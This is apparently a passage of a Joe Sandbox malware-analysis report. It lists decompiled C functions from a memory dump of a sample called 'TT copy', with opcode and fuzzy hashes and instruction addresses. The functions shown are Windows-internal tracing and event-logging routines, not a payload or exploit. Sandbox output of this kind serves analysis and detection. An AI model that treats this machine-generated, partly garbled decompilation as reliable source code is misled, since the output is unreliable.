                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d91319217e2ef2d8e78556119b449e421e9b6e4c1fb969ad2cdc91a12937f905
                                                                                                            • Instruction ID: bf16769ad734b0ed204db14fcae331cd9e354b02d759bc32aa5566f9d2dcc033
                                                                                                            • Opcode Fuzzy Hash: d91319217e2ef2d8e78556119b449e421e9b6e4c1fb969ad2cdc91a12937f905
                                                                                                            • Instruction Fuzzy Hash: A8019E71A04319AFCB14EFA8D841EEEBBB8EF54710F404066F940EB280DA749A40CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 011214FB Relevance: .0, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E011214FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x115d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E010AFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01087D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                            0x011214fb
                                                                                                            0x011214fb
                                                                                                            0x0112150a
                                                                                                            0x01121514
                                                                                                            0x01121519
                                                                                                            0x0112151b
                                                                                                            0x01121526
                                                                                                            0x0112152c
                                                                                                            0x01121534
                                                                                                            0x01121537
                                                                                                            0x0112153a
                                                                                                            0x01121545
                                                                                                            0x01121557
                                                                                                            0x01121547
                                                                                                            0x01121550
                                                                                                            0x01121550
                                                                                                            0x01121562
                                                                                                            0x01121563
                                                                                                            0x01121565
                                                                                                            0x0112156a
                                                                                                            0x0112157f

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aeccb2b6bbf33a4d3355b41665bc4a81358723d037672092fb293b5d4995c720
                                                                                                            • Instruction ID: 231594bb1061392e50319a674b15660dcce8358791bfb60805f6e8fcfae0aa4e
                                                                                                            • Opcode Fuzzy Hash: aeccb2b6bbf33a4d3355b41665bc4a81358723d037672092fb293b5d4995c720
                                                                                                            • Instruction Fuzzy Hash: D1019E71A00259BFCB14EFA8D841EEEBBB8EF55700F444066F954EB280DA74DA40CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010658EC Relevance: .0, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E010658EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x115d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1045c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01065943() != 0 &&  *0x1155320 > 5) {
					E010E7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E010E7B5E( &_v28, _t28);
					_t11 = E010E7B9C(0x1155320, 0x104bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E010AB640(_t11, _t17, _v8 ^ _t29, 0x104bf15, _t27, _t28);
			}















                                                                                                            0x010658fb
                                                                                                            0x010658fe
                                                                                                            0x01065906
                                                                                                            0x0106590a
                                                                                                            0x0106593c
                                                                                                            0x0106593c
                                                                                                            0x0106590c
                                                                                                            0x0106590c
                                                                                                            0x01065911
                                                                                                            0x00000000
                                                                                                            0x01065913
                                                                                                            0x01065913
                                                                                                            0x01065913
                                                                                                            0x01065911
                                                                                                            0x0106591d
                                                                                                            0x010c1035
                                                                                                            0x010c103c
                                                                                                            0x010c103f
                                                                                                            0x010c1056
                                                                                                            0x010c1056
                                                                                                            0x0106593b

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1be5bdc19e1823e2180dcc2da155c13ca792137dcd1a33f52545ab25e58c862a
                                                                                                            • Instruction ID: fc87d10f6015a9b3b17f347b7fc91c693dfda4251088573a48db6fbfc8760ebc
                                                                                                            • Opcode Fuzzy Hash: 1be5bdc19e1823e2180dcc2da155c13ca792137dcd1a33f52545ab25e58c862a
                                                                                                            • Instruction Fuzzy Hash: 8C01A771A00505DFCB54EB69DC04AAE77EDEF451A0F9500A99A9597244DE30ED01C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0107B02A Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0107B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01087D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E010E7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                            0x0107b037
                                                                                                            0x0107b039
                                                                                                            0x0107b03b
                                                                                                            0x0107b040
                                                                                                            0x010ca60e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010ca61d
                                                                                                            0x0107b04b
                                                                                                            0x0107b04e
                                                                                                            0x010ca627
                                                                                                            0x010ca634
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010ca641
                                                                                                            0x010ca653
                                                                                                            0x010ca643
                                                                                                            0x010ca64c
                                                                                                            0x010ca64c
                                                                                                            0x010ca65b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010ca66c
                                                                                                            0x0107b057
                                                                                                            0x0107b057
                                                                                                            0x0107b057
                                                                                                            0x0107b046
                                                                                                            0x0107b046
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                            • Instruction ID: 49b3f3845d1962292326fe9043976928e87ce13c296a91747b3b82f90b06e1b5
                                                                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                            • Instruction Fuzzy Hash: 2501D432700584DFE323871CC848F6A7BD8EF85B40F0900E5FA55CB651E628DC40CA64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01131074 Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01131074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0113165E(__ebx, 0x1158ae4, (__edx -  *0x1158b04 >> 0x14) + (__edx -  *0x1158b04 >> 0x14), __edi, __ecx, (__edx -  *0x1158b04 >> 0x14) + (__edx -  *0x1158b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0112AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01087D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0111FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                            0x01131074
                                                                                                            0x01131080
                                                                                                            0x01131082
                                                                                                            0x0113108a
                                                                                                            0x0113108f
                                                                                                            0x01131093
                                                                                                            0x011310ab
                                                                                                            0x011310ab
                                                                                                            0x011310c3
                                                                                                            0x011310cf
                                                                                                            0x011310e1
                                                                                                            0x011310d1
                                                                                                            0x011310da
                                                                                                            0x011310da
                                                                                                            0x011310e9
                                                                                                            0x011310f5
                                                                                                            0x011310f5
                                                                                                            0x011310fe

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c220398d8982a106baab023aaaf3d43738b90ec0dbfc10983864f3d5c20d303
                                                                                                            • Instruction ID: 3b3799c1654687379fbe65ca687c9ac5ab2f07aed8007da9bf1da66da5d1b72b
                                                                                                            • Opcode Fuzzy Hash: 7c220398d8982a106baab023aaaf3d43738b90ec0dbfc10983864f3d5c20d303
                                                                                                            • Instruction Fuzzy Hash: 1B014C72604742EFC718EF69C900B1ABBE5BBC4314F04C529F99593694EF30D455CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0111FE3F Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E0111FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x115d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E010AFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01087D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                            0x0111fe3f
                                                                                                            0x0111fe3f
                                                                                                            0x0111fe4e
                                                                                                            0x0111fe58
                                                                                                            0x0111fe5d
                                                                                                            0x0111fe5f
                                                                                                            0x0111fe6a
                                                                                                            0x0111fe72
                                                                                                            0x0111fe75
                                                                                                            0x0111fe78
                                                                                                            0x0111fe83
                                                                                                            0x0111fe95
                                                                                                            0x0111fe85
                                                                                                            0x0111fe8e
                                                                                                            0x0111fe8e
                                                                                                            0x0111fea0
                                                                                                            0x0111fea1
                                                                                                            0x0111fea3
                                                                                                            0x0111fea8
                                                                                                            0x0111febd

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fca555e89fc0082fd2b399fedbb1975a4d1e31fdec6824f4bacf4154f8022848
                                                                                                            • Instruction ID: 1b58e302f98ac7820839b9b86b00948b3399f5c480a56207528479c6cb4d0ed1
                                                                                                            • Opcode Fuzzy Hash: fca555e89fc0082fd2b399fedbb1975a4d1e31fdec6824f4bacf4154f8022848
                                                                                                            • Instruction Fuzzy Hash: 22018471A05219ABDB18EFA9D845FAEBBB8EF54700F404066B900EB281DA749941C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0111FEC0 Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E0111FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x115d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E010AFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01087D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                            0x0111fec0
                                                                                                            0x0111fec0
                                                                                                            0x0111fecf
                                                                                                            0x0111fed9
                                                                                                            0x0111fede
                                                                                                            0x0111fee0
                                                                                                            0x0111feeb
                                                                                                            0x0111fef3
                                                                                                            0x0111fef6
                                                                                                            0x0111fef9
                                                                                                            0x0111ff04
                                                                                                            0x0111ff16
                                                                                                            0x0111ff06
                                                                                                            0x0111ff0f
                                                                                                            0x0111ff0f
                                                                                                            0x0111ff21
                                                                                                            0x0111ff22
                                                                                                            0x0111ff24
                                                                                                            0x0111ff29
                                                                                                            0x0111ff3e

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e61c213b82f1dd16700a892fcbcd6621b1fd67c5d64bcc52029ce5815838904
                                                                                                            • Instruction ID: aac797c569ff52df68dff700cd2e05c2a09c278936e0ec4ff675c059db8ab067
                                                                                                            • Opcode Fuzzy Hash: 4e61c213b82f1dd16700a892fcbcd6621b1fd67c5d64bcc52029ce5815838904
                                                                                                            • Instruction Fuzzy Hash: 96018471A0421AABDB14EFA9D845FAEBBB8EF55700F444066B900EB280DA749A41C7D5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01138A62 Relevance: .0, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E01138A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x115d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01087D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010AB640(E010A9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                            0x01138a62
                                                                                                            0x01138a71
                                                                                                            0x01138a79
                                                                                                            0x01138a82
                                                                                                            0x01138a85
                                                                                                            0x01138a89
                                                                                                            0x01138a8c
                                                                                                            0x01138a8f
                                                                                                            0x01138a92
                                                                                                            0x01138a95
                                                                                                            0x01138a9f
                                                                                                            0x01138ab1
                                                                                                            0x01138aa1
                                                                                                            0x01138aaa
                                                                                                            0x01138aaa
                                                                                                            0x01138abc
                                                                                                            0x01138abd
                                                                                                            0x01138abf
                                                                                                            0x01138ac4
                                                                                                            0x01138ada

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6e302188008d36a21481c5ca9e54b962e2d9df92bd2326ac2defc709aefa6231
                                                                                                            • Instruction ID: a55bc43d05016525eb3f5c1bfc468873e9b3dad117d829af15ddbd89691bbbe0
                                                                                                            • Opcode Fuzzy Hash: 6e302188008d36a21481c5ca9e54b962e2d9df92bd2326ac2defc709aefa6231
                                                                                                            • Instruction Fuzzy Hash: BF012CB1A0021DAFCB04DFA9D9419EEBBB8EF58310F50405AF905E7341D734A901CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01138ED6 Relevance: .0, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E01138ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x115d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01087D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                            0x01138ed6
                                                                                                            0x01138ee5
                                                                                                            0x01138eed
                                                                                                            0x01138ef0
                                                                                                            0x01138efa
                                                                                                            0x01138f03
                                                                                                            0x01138f0c
                                                                                                            0x01138f15
                                                                                                            0x01138f24
                                                                                                            0x01138f27
                                                                                                            0x01138f31
                                                                                                            0x01138f43
                                                                                                            0x01138f33
                                                                                                            0x01138f3c
                                                                                                            0x01138f3c
                                                                                                            0x01138f4e
                                                                                                            0x01138f4f
                                                                                                            0x01138f51
                                                                                                            0x01138f56
                                                                                                            0x01138f69

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9cad305492db10bd8ba07d444e52bdd57526578e2f8cdecf5288158427b5f9ef
                                                                                                            • Instruction ID: f79e0c3d89c5187722c443d0b8ee6c3dd4f5f6f1346432033069c5a95eb15c66
                                                                                                            • Opcode Fuzzy Hash: 9cad305492db10bd8ba07d444e52bdd57526578e2f8cdecf5288158427b5f9ef
                                                                                                            • Instruction Fuzzy Hash: 1A111E70A04219DFDB04DFA8D541BAEBBF4FF08300F5442AAE558EB382E6349940CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106DB60 Relevance: .0, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0106DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0106DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0106E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0106E8B0(__ecx, _t14, 0xfff);
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                            0x0106db64
                                                                                                            0x0106db66
                                                                                                            0x0106db6b
                                                                                                            0x0106dbaa
                                                                                                            0x0106db71
                                                                                                            0x0106db76
                                                                                                            0x0106db7a
                                                                                                            0x0106dba3
                                                                                                            0x0106db7c
                                                                                                            0x0106db87
                                                                                                            0x0106db8b
                                                                                                            0x010c4fa1
                                                                                                            0x010c4fb3
                                                                                                            0x010c4fb8
                                                                                                            0x0106db91
                                                                                                            0x0106db96
                                                                                                            0x0106db98
                                                                                                            0x0106db98
                                                                                                            0x0106db8b
                                                                                                            0x0106db7a
                                                                                                            0x0106db9d
                                                                                                            0x0106dba2

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                            • Instruction ID: 02da0e26a296afcf2b74462bee3c9367f9679002b7ef7722c6a905b6e1f3538f
                                                                                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                            • Instruction Fuzzy Hash: D4F06833345623DBD7326AD98894F5BBA9D9F92A60F190075F2C59B24CCA64880297D1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106B1E1 Relevance: .0, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0106B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01087D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01087D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E010E7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                            0x0106b1e8
                                                                                                            0x0106b1ea
                                                                                                            0x0106b1f3
                                                                                                            0x010c4a17
                                                                                                            0x0106b1f9
                                                                                                            0x0106b1f9
                                                                                                            0x0106b1f9
                                                                                                            0x0106b201
                                                                                                            0x010c4a21
                                                                                                            0x010c4a2e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c4a3b
                                                                                                            0x010c4a4d
                                                                                                            0x010c4a3d
                                                                                                            0x010c4a46
                                                                                                            0x010c4a46
                                                                                                            0x010c4a55
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0106b20a
                                                                                                            0x0106b20a
                                                                                                            0x0106b20a
                                                                                                            0x0106b20a

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                            • Instruction ID: 3a34fc4c23689dc9a09c093867a6275987d7d58d99b6b463c754af80ccefbc4e
                                                                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                            • Instruction Fuzzy Hash: 08018132304681EBD322A75DC804FAD7BDDFF51B54F0940A5FA94CB6B2D679C800C615
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010FFE87 Relevance: .0, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E010FFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x115d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01087D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                            0x010ffe96
                                                                                                            0x010ffe9e
                                                                                                            0x010ffea1
                                                                                                            0x010ffead
                                                                                                            0x010ffeb3
                                                                                                            0x010ffeb9
                                                                                                            0x010ffec3
                                                                                                            0x010ffed5
                                                                                                            0x010ffec5
                                                                                                            0x010ffece
                                                                                                            0x010ffece
                                                                                                            0x010ffee0
                                                                                                            0x010ffee1
                                                                                                            0x010ffee3
                                                                                                            0x010ffee8
                                                                                                            0x010ffefb

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
